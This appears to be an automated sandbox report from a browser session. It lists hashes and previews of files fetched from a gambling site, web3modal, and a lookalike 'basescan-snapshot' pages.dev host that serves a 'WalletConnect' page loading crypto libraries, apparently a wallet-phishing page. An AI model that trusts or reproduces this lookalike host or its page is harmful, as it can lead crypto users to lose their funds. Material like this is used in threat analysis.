                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,........C...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):74
                                                                                                                                                                                                                                              Entropy (8bit):4.7090098726965355
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:CZm4R3mWIebqdveXbFy:IbRWW5bqdGQ
                                                                                                                                                                                                                                              MD5:F912A39D88D6DF3A7FF31638FC40EC00
                                                                                                                                                                                                                                              SHA1:05DBA80FB1DA1470F782119488726BAB1A60BD04
                                                                                                                                                                                                                                              SHA-256:9B663BC649909D6D468990A65268BCAE08E89104432955D1466B26927814424B
                                                                                                                                                                                                                                              SHA-512:5FB14F34CE7CE06D1C659167A39CB3EB869714383A95EC1FBEAE3356AAE5B20F92653066FC8C95F947EEE7A53E6129C2C0F1E7E7B776CD0E0F0441F8BE8A0CBD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/countries-18533370.js
                                                                                                                                                                                                                                              Preview:const s="/modules/lottery2/assets/countries-7a4535f1.png";export{s as c};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):24052
                                                                                                                                                                                                                                              Entropy (8bit):7.985137243554437
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:anG7RGun5AGMhFdGD+tENkQ1fUJB3WhCDxrjDGEIXr/UtuVrWi0zwQb5B:anGk85AG8FUDurWYjDGgurf0zws
                                                                                                                                                                                                                                              MD5:7FFC6F0C8BD6BA52615920504F87EE7C
                                                                                                                                                                                                                                              SHA1:46F066C9DD56EB3E26526CB1E24BD5D64806B67F
                                                                                                                                                                                                                                              SHA-256:8A07D5528F39415A4D21C27298067170840EAD8C16E3C803FDE2CCA32E3EC0DB
                                                                                                                                                                                                                                              SHA-512:523B396E262BA5CC1226B322BD1F75802AD6FFB93357F95599A2E9B760E2EC116ECF78B2F7E0567880F785A54C33EDFA3B5C7004758A1208A8D39457DFE476BB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............^.....sRGB.........PLTE.U....X3.U0..R.\6#..........T.J*.M,.b<)_9&oD2.4.G'.i?-C$.Q/.d>,X4#.5.D!.lA/O*.?!.$...N..../..+........e;%.I."...P.9.....4..K'...._*.X'.h>).0.> .P$..A.7..P,..h.)...C.?......P..L.7.J".a8"m,..>.1...c..;.:..f+..G.U-..-..Pr*..J`6..D.@......sJ5.<..`.z0....r0..@..I....DD..e&...;_#.k'....x*..?...<.W..H|;.J..qI"R....SrG0.I.g9..Z(=..iC..s5.[..`..rS.3..=..:...*...g3.l+|T(.?..a;.U&.....D.N.I..Y..I..PX!....B..b*..N.T23..s;...[\1..^3.w1..[....`D.q.55%..|.hH.Z.V<.[7{Q9.X..m9.y<.7.D..f.S......c.zW.o.S..`.{(.S`:..U..iA.-.2..{/@.'...~L..V3....zO.....\.X...l>.i.}.b..G$.d.M....*..J(.zW~L,.q.sI.{g.k .lJ.p*.H.......V~aP.uM.x...j..9...zS.vL{XB.T.....9..lE.u..$...kS.(jQC.Z..c0.m.K6.....h.x.Z..;...cS>5_H=.|.......'.q".....xk.........j]... .IDATx^t.{hZ...X...<}FC<!.Z.(..8..q.m.C.....[k.Q.V<.}...1M......Ch.r......x...G...l.........B.........e..=.5.D]K{..u.....eS.Wtmy..a........@.S.....y..\n_O./^...$<
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4624
                                                                                                                                                                                                                                              Entropy (8bit):7.940402980477411
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:2saWJDT9QuyJDEWRCWpFel5S1RURAxrbRUi41tnnmwNt+hhEH:9fdG3wWpFSk1KR4rbRUx1xmAt+h
                                                                                                                                                                                                                                              MD5:1BA0E02799C16AEB565F47831D13AFBA
                                                                                                                                                                                                                                              SHA1:8F902E52B5C0964EC450928EFB2C3855C6190D04
                                                                                                                                                                                                                                              SHA-256:EAC7EE8C6A37D9123559885B66593F39A9C9DFE38997BF9F50DA791EBE907BB1
                                                                                                                                                                                                                                              SHA-512:86151FB8DDE8A57997127684160670A682A42E3191EA4C70505FB979CF972EB7D6F2DCDEF9360E79C05B02C1969269E93A5844DF6A80A54E87F80D8930DC3414
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/ef1a1fcf-7fe8-4d69-bd6d-fda1345b4400
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 .....o...*....>I$.E..!..TL(....p...z...>.........k.uo.....<...gr;k.y...~.......b.=.?.....O...z..........G.........?.@?.t....'...v.....{...?`.....C. ....|%........(....EY..3.>.....`..~i....~.......H%..t..C.X...<.r..!..y..c.C.......L..;..y..#.w+...0G..V=.:`.!.{.t..C.X...M_.v..=%.i.....Q.#.w+.........$...>...(...G...{1>D:`.!.....?.....!2.=]..=U..r..!.......JA..b..N.....F/..R..=.).. W...{..Q....<.o.G..Ic../..Zj.........Z2...........*...wi....8.=......,....lF...R....X.....U.@m.Z~._....I6Ah~.O~.V.3.].\.....u:..#....P5.IP...;..S...8[=9o.S*m..!..f..mnc.!..gk.9....bn.}.-........'..,h.W..i.....v..R.d..(=.o..N.yYK,...$...Z#..........U...*.F......SI.};..o..<kGTH.a}...t..#.a.M.......*(3.+..N..c.j@p.G..N..%.c...~.!1.h|.:.... j...w.>v,..I.{f!<...L...y..H.9..W...+$s.f..uc..B`.;#}.!..?...9......X...<.r..!..y..c.C.......L..;..y..#.w+...0G..V=.:`.!.{.t..C.X...;@....G.E!.....d..B.........N.i....i..{.#.x.-...cvp..`GJ.r.~A...~N.s............
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):145
                                                                                                                                                                                                                                              Entropy (8bit):4.736099746556875
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:qEbNPL5YHk2FLpTOH8jGz28RIVbZyckiqmXEIAgGHJBxaXF/F3Ywn:qez5YHkELpe8ji28R8Z1kiTEIABHrxav
                                                                                                                                                                                                                                              MD5:749E53C79DEDCB28DDA8AE8EC85380F8
                                                                                                                                                                                                                                              SHA1:89F23C075D8B1D707F1C09DF37D8079CE874EE57
                                                                                                                                                                                                                                              SHA-256:12957FDC2D6EAD0DD97DB32710069589D1FA6632C355A6DD8F54FF6F6A50986F
                                                                                                                                                                                                                                              SHA-512:0F514A1818253272785B87C623D9B5013AD1D0164CB51E4809F278D114D3C3121284C376EBDA1E0E878BBE64BAF229F08D2CD88EE8E7F8724CACD4072498A2A7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/type-bfb25fc4.js
                                                                                                                                                                                                                                              Preview:var o=(n=>(n.Money="Money",n.LuckySpin="LuckySpin",n.FreeSpin="FreeSpin",n.Lottery="Lottery",n.Deposit="DepositBonus",n))(o||{});export{o as R};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):285
                                                                                                                                                                                                                                              Entropy (8bit):5.044734572146753
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:1V3nmToQTtrIO9IB2D9Sr8FEcOWwCJZ2xAoWtVQqUfQ+KA8NrLw:1JALqmcr8FEclei2bYW
                                                                                                                                                                                                                                              MD5:7A21317E43DC16F8E0460DD8B21CA1EE
                                                                                                                                                                                                                                              SHA1:A5C1D266434D196AA1F76F48B95641379CCC2F88
                                                                                                                                                                                                                                              SHA-256:CF138B0A1D028113ECFF1AC64E4A477C2C7A4377BB947EB8D316D34AD13B4C3D
                                                                                                                                                                                                                                              SHA-512:9F6F8A74AA67D905CF5DFD432E5ED7574E23B74F64C1AA1C0F33ABE5EBCF7A1EEF8CBECA3845C24380092A3E06E118B2AE9A7853D4BCBB416F0A92961365CE06
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/center-loading-1eaab0a0.js
                                                                                                                                                                                                                                              Preview:import{j as t,b as a,i as s,c as n,t as o}from"./web-13cf6287.js";import{c,Z as i}from"./manifest-51a3674f.js";var m=o("<div>");const f=r=>(()=>{var e=m();return t(e,a(r,{get class(){return c("flex items-center justify-center p-4",r.class)}}),!1,!0),s(e,n(i,{})),e})();export{f as C};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):285
                                                                                                                                                                                                                                              Entropy (8bit):5.044734572146753
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:1V3nmToQTtrIO9IB2D9Sr8FEcOWwCJZ2xAoWtVQqUfQ+KA8NrLw:1JALqmcr8FEclei2bYW
                                                                                                                                                                                                                                              MD5:7A21317E43DC16F8E0460DD8B21CA1EE
                                                                                                                                                                                                                                              SHA1:A5C1D266434D196AA1F76F48B95641379CCC2F88
                                                                                                                                                                                                                                              SHA-256:CF138B0A1D028113ECFF1AC64E4A477C2C7A4377BB947EB8D316D34AD13B4C3D
                                                                                                                                                                                                                                              SHA-512:9F6F8A74AA67D905CF5DFD432E5ED7574E23B74F64C1AA1C0F33ABE5EBCF7A1EEF8CBECA3845C24380092A3E06E118B2AE9A7853D4BCBB416F0A92961365CE06
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{j as t,b as a,i as s,c as n,t as o}from"./web-13cf6287.js";import{c,Z as i}from"./manifest-51a3674f.js";var m=o("<div>");const f=r=>(()=>{var e=m();return t(e,a(r,{get class(){return c("flex items-center justify-center p-4",r.class)}}),!1,!0),s(e,n(i,{})),e})();export{f as C};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (369)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                                              Entropy (8bit):4.965459885930902
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:QYpFo/IO9IvddJCidDbx7sTKjim4YDbfuPsCJ7Y4pvRNFenl+Lwn:xavqvLUQDbxs3m4YDbfuG4pXksLw
                                                                                                                                                                                                                                              MD5:1AD3A3520760DF4FA9CC4EC35E1F7ECC
                                                                                                                                                                                                                                              SHA1:B87C7D5005730EEA8E167156B5C11837DFEEEC31
                                                                                                                                                                                                                                              SHA-256:BC1C6936B1728DAAF439415D160EDF3960A11635979AFD652788BBEC564C3C4C
                                                                                                                                                                                                                                              SHA-512:1B33AB5BA8B3771DF706A6CD70D4343DAB7EA263D9E89DC196ABE5192B05D2EA7E96F988EF5F41787F7CE43E4A2393034890169626C8D985A26F0EA81E40B499
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{n as s,j as o,l as r}from"./manifest-aca455c4.js";const c=()=>{const{amount2local:t}=r;return(n,e)=>{const a=n?new o(Number(n)):new o(0);return Number(t(a,"USD").toFixed(e||2))}},l=()=>{const{amount2localStr:t}=r;return n=>{const e=n?new o(Number(n)):new o(0);return t(e,"USD")}},i=()=>{const{currencyName:t}=r;return s.getAlias(t)};export{c as a,i as g,l as u};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):31538
                                                                                                                                                                                                                                              Entropy (8bit):7.988671825806621
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:NgG5GUR74eI6hTCEGxOsEPIUvbr9OYkpfUiTdvGKn3:6GxR74eaxLUvoYkpnTdL3
                                                                                                                                                                                                                                              MD5:9A142DEF8497888A3B2890136F66FDE0
                                                                                                                                                                                                                                              SHA1:DCF2FAEBC1EAA5847EFD9AD87CE16E7BE8B28AD9
                                                                                                                                                                                                                                              SHA-256:836B13ADEC6C739BF524E3374C0A7C58F59140A1AF5CC70617B20D163745BC55
                                                                                                                                                                                                                                              SHA-512:76EBDD137138989978386010F300D99FEC529AE8799B85421C03D7632FC30508F00132B7423DDB082AC623780EC893F922167C01C795BFB516329039247BFDF5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/getWalletImage/018b2d52-10e9-4158-1fde-a5d5bac5aa00
                                                                                                                                                                                                                                              Preview:RIFF*{..WEBPVP8L.{../..c.MHr.I.$H...X.....Y..#.?...~..%...G......v.1...8....y...$v1.A.D...&.8....0..f.6..0.pP.P...'3MT.1...@..U.|..u..*6U/1.P....j.......b.#..b..U;_.a.V*.. Q..cT.T...q.'.....KX}PU...1ts.%s)pl..b......k..nR...,...i....M=...p\U....:...MQ]....U.L.&&.@.ih...d......gw.5.Y*.c.B..U.c.;.q.......m.%@.Hn]..s.Y.;....m..`N....l.JRI. ...'|.....Au.L..E.ctU...t3.*.... V...).........w...6..(L.U...eCX.(p.YN}'..0.R.V..$.1...T...b.$..1FS..}..;.S.`.S....A~...[&.}.rnmS$....D.....!.D...Rx..}UxLY.m...a...vf..7...K./7B<.C..B.l...k7%9g[9...=.....\....v>....O.R.1.Y........4.k....Q.}....R..1%:aK[.it.H ...<....?&.Q.3"......!.|...f'"..A.....^.5.yvI..0.B....n..7......B........rk..DfO....0<}....)P.^.z.....,"Q...i...K..]. &".....i7D$.M..S.)....=..g.TM. ...#.t.R..@8{:vDU.Pe?(.....c..A.....M..}..h......`......>..4.5...S.|.[.3N....)...y.....Z".$. .....D.....E......R...$.Z......h..T...m.;.K<5'....@...bm.J.......M...XY....H...... ....:w.6.v.....bQ@.....n..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8274)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):11135
                                                                                                                                                                                                                                              Entropy (8bit):5.460751362876675
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:AXajubbBkBn2ktQaY86sd5KmSVxYzuQ7iWGZTgaXkXYX4XhXEXYVEBHf7HTWHMkp:Apbkn2ktQaN6KSHY6Q7ibZTgce6aB+YT
                                                                                                                                                                                                                                              MD5:08BDA738E245823F190F5F1949314019
                                                                                                                                                                                                                                              SHA1:6FF0291D89B0E3DE52C6586623DBEC07A3D5F09A
                                                                                                                                                                                                                                              SHA-256:14CE7879EAE193FC90C96CC7D5B8D95421F5DCDF90AE19D366B48AF8DE0B9A57
                                                                                                                                                                                                                                              SHA-512:D97E1E754C584D7FE85B6EFEFD44E810BEE10BC2FDAEC2BD047F8BC1D4E4686AADE8154EF4A7C1C5CE99CE9A618BEFA90DF236F2438459791A36DF6E0DD7AEB3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-C-NOM3iv.js
                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["assets/ThrowAndHighRolles-DADNM0eC.js","assets/index-DD2Zk4iT.js","assets/index-CrXVjlJA.css","assets/index-DH9MDtxd.js","assets/_basePropertyOf-BhSQSS-6.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{c as i,t as f,ay as B,aB as U,X as O,_ as F,y as N,d as W,aC as j,a as C,b as x,o as D,F as L,ah as K,ak as S,i as p,x as h,l as $,s as y,h as k,q as J,D as H,m as E,C as w,aD as V,B as A,f as _,P as Z,Q as I,aE as G,a1 as q,a7 as Q,aF as X,aG as Y,aH as ee,u as te,ao as ne,j as se,aI as re,aJ as ae,G as P,a9 as le,e as z,W as oe,r as ie,aK as ce,g as ge,al as ue,aL as me,aM as de}from"./index-DD2Zk4iT.js";import{S as be}from"./index-CMxvzQWG.js";const R=O(()=>F(()=>import("./ThrowAndHighRolles-DADNM0eC.js"),__vite__mapDeps([0,1,2,3,4])));function mt(){return[i(be,{get title(){return f("Latest bet & Race")}}),i(B,{class:"mt-2 ml-auto max-w-100 sm:!-mt-10",get children(){return[i(B.TabItem,{get title(){return f("Latest Bet")},class:"mt-3 min-h-96",ge
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):6167
                                                                                                                                                                                                                                              Entropy (8bit):7.918910290347276
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:k52WJiUFsqNBsyuV/rKn8z2lEw9peCvR90r8CQLb4rLVTdq:y2pxoFu5U8qN9pee0r8Rm5q
